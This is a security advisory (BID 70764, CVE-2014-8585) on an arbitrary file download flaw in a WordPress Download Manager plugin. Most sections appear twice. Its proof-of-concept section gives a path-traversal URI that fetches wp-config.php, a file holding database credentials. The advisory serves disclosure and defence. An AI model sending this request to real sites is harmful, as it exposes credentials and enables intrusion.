WordPress Download Manager Plugin 'file_download.php' Arbitrary File Download Vulnerabilitiy
BID:70764
Info
WordPress Download Manager Plugin 'file_download.php' Arbitrary File Download Vulnerabilitiy
| Bugtraq ID: | 70764 |
| Class: | Input Validation Error |
| CVE: |
CVE-2014-8585 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 26 2014 12:00AM |
| Updated: | Nov 12 2014 12:58AM |
| Credit: | Hugo Santiago dos Santos |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
WordPress Download Manager Plugin 'file_download.php' Arbitrary File Download Vulnerabilitiy
The Download Manager plugin for WordPress is prone to an arbitrary file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
The Download Manager plugin for WordPress is prone to an arbitrary file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
Exploit / POC
WordPress Download Manager Plugin 'file_download.php' Arbitrary File Download Vulnerabilitiy
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
Solution / Fix
WordPress Download Manager Plugin 'file_download.php' Arbitrary File Download Vulnerabilitiy
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
WordPress Download Manager Plugin 'file_download.php' Arbitrary File Download Vulnerabilitiy
References:
References: